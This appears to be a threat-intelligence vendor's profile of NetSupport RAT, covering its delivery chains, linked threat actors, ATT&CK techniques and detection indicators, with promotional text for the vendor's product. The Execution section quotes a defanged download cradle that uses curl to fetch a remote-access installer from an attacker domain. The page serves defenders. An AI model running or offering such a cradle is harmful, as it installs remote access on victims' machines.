NetSupport RAT
NetSupport RAT is the malicious use or derivative of the legitimate NetSupport Manager remote administration product, widely referred to by defenders as NetSupport RAT. It provides unauthorized remote access to compromised Windows systems and has been described as giving operators full control of an infected endpoint. Reported capabilities include remote control, file exfiltration, loading and executing additional payloads, and use as a backdoor or follow-on access mechanism.
The malware is frequently delivered through social-engineering and malware-delivery chains rather than as a standalone initial vector. Observed delivery methods in the provided content include ClickFix and paste-and-run lures that trick users into executing commands, fake CAPTCHA prompts, fake browser or software update pages, malvertising, compromised websites, malicious JavaScript loaders, signed MSIX installer chains, and custom loaders such as PowerNet. It has also appeared as a final payload or secondary payload delivered by other malware and traffic-distribution ecosystems including SocGholish/FakeUpdates, Hancitor, Scarlet Goldfinch, SmartApeSG/ZPHP/HANEYMANEY activity, GrayAlpha/FIN7-linked infrastructure, TAG-150 campaigns, and GHOSTPULSE. Specific reporting also notes attempted NetSupport RAT delivery via a briefly compromised Gizmodo website and via a supply-chain compromise of the Okendo Reviews widget.
Threat-actor and ecosystem associations directly mentioned in the content include FIN7/Carbanak, GrayAlpha, SmartApeSG, TA569-linked SocGholish operations, and broader financially motivated crimeware activity. The malware is described as a staple of financial crimeware and has been observed in intrusion chains that also led to GhostWeaver, LockBit, RansomHub, AsyncRAT, Remcos RAT, StealC, Sectop RAT, Rhadamanthys, Vidar, Lumma, and ransomware deployment.
Targeting in the provided material is primarily Windows endpoints, though campaigns delivering it have affected victims across many sectors through compromised websites, phishing, fake updates, and malvertising. Industries and victim types mentioned in related delivery ecosystems include nonprofits, schools, healthcare and hospitals, legal organizations, real estate, media, retail, hospitality, and financial organizations.
High-confidence indicators and artifacts mentioned in the content relate mainly to abused NetSupport Manager deployments: the primary execution engine client32.exe; configuration files such as client32.ini containing a gateway address and encrypted Global Security Key; suspicious placement of signed binaries in C:\Users\Public\ or randomized folders; unusual cracked-license strings including NSM1234 and HANEYMANEY; and network traffic that may include the User-Agent string "NetSupport Manager/1.3."
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
A legitimately signed NetSupport Manager v14.12 binary -- bearing a valid GlobalSign EV code-signing certificate issued to NETSUPPORT LTD -- is being weaponized as a Remote Access Trojan across two active delivery chains.
Groups observed using it
20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
На компьютерах под управлением Windows атакующие пытались установить NetSupport RAT. Этот троян злоупотребляет легитимным инструментом удаленного администрирования NetSupport Manager и предоставляет своим операторам доступ к зараженной системе.
Similar to other RMM tools, NetSupport manager has been exploited to be used maliciously, to a point of a malicious by-product of the platform being created - aptly named NetSupport RAT.
Similar to other RMM tools, NetSupport manager has been exploited to be used maliciously, to a point of a malicious by-product of the platform being created - aptly named NetSupport RAT.
The group has been linked to past campaigns that delivered dangerous tools including NetSupport RAT, Remcos RAT, StealC, and Sectop RAT.
The TA571 campaign contained at least two different command lines running different PowerShell scripts, one leading to DarkGate via a downloaded HTA-file that ran another PowerShell script and one leading to NetSupport RAT via a downloaded ZIP file.
Scarlet Goldfinch is a cluster of activity that Red Canary first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is an RMM tool that provides the adversary remote control over a system.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
7 techniques
Initial Access
QuickAssist has become a mainstay for initial access by ransomware actors, often leveraged alongside external Microsoft Teams messages.
A compromised account was exploited to inject a malicious script, briefly exposing users to scam content.
A newly discovered supply chain attack has put thousands of e-commerce websites at risk after a popular third-party reviews widget was quietly turned into a malware delivery tool.
TA571 email lure. In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word.
Execution
6 techniques
Execution
LummaC2 reaches out to remote resources via encoded PowerShell commands... Threats like SocGholish and Scarlet Goldfinch sometimes use malicious scripts compressed via a zip file.
That command then pulled down a PowerShell script or HTML Application file, which installed a remote access tool or information stealer on the victim’s machine.
After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi
In this incident, the SmartApeSG injected JavaScript behaved as a staged loader, and did not attempt to execute every action immediately.
Persistence
2 techniques
Persistence
QuickAssist has become a mainstay for initial access by ransomware actors, often leveraged alongside external Microsoft Teams messages.
Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.
Stealth
4 techniques
Stealth
Threat actors continue to impersonate well-known brands via sponsored search results... Because it includes the official logo and website for Notion, most users will not think twice and click on the link.
Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.
Lateral Movement
1 technique
Lateral Movement
Over the last few years, threat actors have flocked to exploit legitimate remote monitoring and management (RMM) tools—blue-chip IT software like ScreenConnect, LogMeIn Resolve, and PDQ Connect—blurring the line between legitimate IT administration and malicious intrusion.
Collection
1 technique
Collection
Command and Control
3 techniques
Command and Control
The Hancitor malware, first observed in 2015, is a downloader known to deliver several other malware. In its first years, Hancitor was observed delivering information stealers such as Pony or Vawtrak, and in recent years, Ficker stealer and NetSupport RAT. In 2021, Hancitor was observed delivering the Cobalt-Strike attack framework...
Insikt Group identified three main infection vectors associated with GrayAlpha: fake browser update pages, fake 7-Zip download sites, and the TDS TAG-124 network. Notably, the use of the TDS TAG-124 delivery mechanism had not been publicly documented prior to this report.
IOCs tracked for this family
406 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
165 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan delivered via a ClickFix fake CAPTCHA campaign; it abuses the legitimate NetSupport Manager remote administration tool to give operators access to the infected Windows system.
A remote access trojan that abuses the legitimate NetSupport Manager tool to gain access to systems, exfiltrate files, and deliver additional payloads including ransomware.
A remote access trojan observed as a downstream payload from SocGholish-delivered loaders.
A remote access trojan observed as a downstream payload in SocGholish delivery chains.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.